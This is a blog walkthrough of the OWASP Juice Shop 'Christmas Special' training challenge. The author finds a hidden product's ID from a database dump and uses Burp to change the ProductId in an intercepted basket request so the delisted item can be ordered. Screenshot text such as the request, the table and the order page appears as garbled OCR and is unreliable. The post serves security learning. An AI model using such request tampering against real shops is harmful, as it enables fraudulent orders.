Information Security

Hacking OWASP’s Juice Shop Pt. 39: Christmas Special

Posted on by codeblue04

Challenge: 

Name: Christmas Special

Description: Order the Christmas special offer of 2014.

Difficulty: 4 star

Category: Injection

Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html

Tools used:

Burp, FoxyProxy

Resources used:

Database Schema

Methodology: 

Yet again the database dump I performed during the Database Schema challenge pays dividends. While the expanded description for this challenge makes it clear that this is intended to be a much more difficult task, being able to simply search the product table for the word “Christmas” means that it’s basically a 3 star challenge.

[41 entries] I id | 255 | name 2020-11-02 21 2020-11-02 21 2020-11-02 21 : 00 2020-11-02 21 2020-11-02 21 2020-11-02 21 2020-11-02 21 : 00 2020-11-02 21 2020-11-02 21 2020-11-02 21 +00: 00 2014-12-27 2020-11-02 21 2019-02-01 2020-11-02 21 2017-04-28 2020-11-02 Apple Juice (løøøml) Orange Juice (løøøml) Eggfruit Juice (5øøml) Raspberry Juice (løøøml) Lemon Juice (500ml) Banana Juice (løøøml) OWASP Juice Shop T-Shirt OWASP Juice Shop CTF Girlie-shirt OWASP SSL Advanced Forensic Tool (o-saft) Christmas Super-surprise-Box (2014 Edition) Rippertuer Special Juice OWASP Juice Shop sticker (2015/2016 design) OWASP Juice Shop Iron-ons (16pcs) image apple_juice. jpg orange_juice. jpg eggfruit_juice. jpg raspberry_juice. jpg lemon_juice. jpg banana_juice. jpg fan_shirt . jpg fan_girlie. jpg orange_juice. jpg undefined. jpg undefined . jpg sticker. png iron-on . jpg price 1.99 2 .99 8.99 4.99 2.99 1.99 22 .49 22 .49 0.01 29.99 16.99 999.99 14.99 createdAt 1 3 4 5 6 8 9 10 11 12 13 255 255 255 255 255 255 255 255 255 255 255 255 255 I deletedAt NULL NULL NULL NULL NULL NULL NULL NULL NULL NULL

Once I found the product ID number from the database, I simply used Burp Suite and FoxyProxy to solve this. I merely logged into a user account, added a random product to that user’s basket, intercepted that packet, and updated the “ProductId” field to match the product ID number of the 2014 Christmas Super Surprise Box. With that done, I sent off the packet and crossed this challenge off the list.

Request Params Headers "SON web Tokens Pretty Raw Actions VI 1 'POST /api/aasketltems/ HTTP/I.I Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; application/ j son, text/ plain, 1/ * 4 Accept S Accept -Language: en-LlS, Accept -Encoding: gzip, deflate rv.7; Authorization: Bearer eyJOeXA101JKVIQiLCJhbGciOi Content -Type: application/ j son 9 Content -Length: 43 Origin: http // I Ocal host 3000 LI Connection: close Referer: http://localhost : 3000/ LS Cookie: language=en; welcomebanner status=dismis: LSI{ 'Product Id Basket Id quantity
Response Headers Render Pretty Raw 200 0K 1 *ctions v Access-Cont rol -Allow-Origin: S X-Content -Type-options: nosniff SAMEORIGIN Feature-policy: payment self' Content -Type: application/ j son; charset=utf- 7 Content -Length: 158 a-rag: R,' '9e-M8uaR7h1Ag1feSXsvoS9pYfZve1" Vary: Accept -Encoding 10 Date: Thu, OS Nov 2020 23:21 Gl•rr Il Connection: 13 { status data" "id" : 18, cl ose success , "Product Id ' aasketld quantit 'updatedAt' createdAt' '2020-11-OST2S: 21 21 817?' , 2020-11- OST2S: 21 21 817?'
Your Basket (admin@juice-sh.op) Christmas Super- Christmas Super-Surprise-Box Surprise-Box (2014 Edition) (2014 Edition) Checkout 1 Total Price: 29.99m You will gain 3 Bonus Points from this order!
You successfully solved a challenge: Christmas Special (Order the Christmas special offer of 2014.) Thank you for your purchase! Your order has been placed and is being processed. You can check for status updates on our Track Orders page. Your order will be delivered in 5 days. Delivery Address Administrator 0815 Test street, Test, Test, 4711 Test Phone Number 1234567890 Order Summary x Product Christmas Super- Surprise-Box (2014 Edition) Price 29.99Ä Quantity 1 Items Delivery Promotion Total Price Total Price 29.99Ä 29.99Ä O. OOZ O. OOZ 29.99Ä

Prevention and Mitigation Strategies:

OWASP SQL Injection Prevention Cheat Sheet

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s